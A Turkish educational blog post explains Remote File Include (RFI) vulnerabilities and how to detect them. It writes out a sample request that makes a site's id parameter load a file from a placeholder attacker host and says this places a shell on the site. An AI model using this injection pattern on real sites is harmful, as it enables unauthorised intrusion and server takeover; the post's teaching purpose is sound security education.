15 49.0138 8.38624 1 1 4000 1 https://womaneng.com 300

RFI (Remote Fıle Include) Nedir?

RFI, uzaktan dosya dahil etmek anlamına gelmektedir. Diğer açık türlerinde olduğu gibi bu açık da izinsiz olarak yapılmaktadır. Bu açığın mantığı açık bulduğumuz siteye istediğimiz bir dosyayı dahil etmektir. Yani herhangi bir exploit kodu veya editör yardımı ile uzaktan zararlı dosya olarak belirlediğimiz Shell dosyamızı yükleyerek sisteme sızabilmekteyiz. Bu açık türü güncel olarak fazla bulunmamasına rağmen tam olarak önlem alınamamıştır. Yeni çıkan editörler bazı kodlama noktalarında açıklar bırakmıştır bu açıklar da çeşitli buglara neden olmaktadır. Bu buglar ile birlikte siteye kolay bir şekilde sızılarak shell yüklenebilmektedir. İzinsiz olarak yüklenen bu dosyalar sunucu üzerinde yer alan diğer web uygulamaları üzerinde de etki bırakabilmektedir. Bu açık türünün yaygın olmamasıyla birlikte herhangi bir hata sunucuda bulunan tüm siteleri olumsuz etkileyebilir. Bu hata da maddi manevi birçok zararı beraberinde getirebilir. Web uygulamalarımız üzerinde bu tarz güvenlik açıklarının meydana gelmemesi için kişi kendine özel yazılım kullanmalıdır bu sayede bu gibi açıklar söz konusu olmayacaktır. 

Bu açığı nasıl tespit edebileceğimizi bir örnek vererek açıklayalım. Bir web sitesi düşünelim; www.birsite.com/index.php?id=3 olsun. Id değerinden sonraki 2’yi siliyoruz, www.birsite.com/dosya.php?id= elde ediyoruz peki şimdi burada açık olup olmadığını tespit edelim. 

Bir host üzerine txt uzantılı bir dosya yükleyelim. Daha sonra site üzerinden www.birsite.com/dosya.php?id=http://www.saldirgan.com/RFI.txt? şeklinde çağıralım. Eğer sayfa üzerinde çağırılan dosya çalıştıysa açık bulunmuş oluyor. Ve siteye shell yüklenmiş oluyor . 

Bir önceki yazımız olan LFI - Local File Include Nedir? başlıklı makalemizde LFI nedir, LFI RFI ve Local File Include hakkında bilgiler verilmektedir.

Paylaş:
Önceki
LFI – Local File Include Nedir?
Sonraki
XSS (Siteler Arası Kod Yazma) Nedir?
HAKKIMDA
Zeynep Küçük

Hi, I’m Zeynep I am studying in computer engineering in Samsun. I love to share and write about anything that interests me in tech, so welcome on my blog. I’d be really glad to get in touch with you! Don’t forget you can always contact me by email for any inquiries.Follow me on social media.

0 Yorum

Yorumla

This site uses Akismet to reduce spam. Learn how your comment data is processed.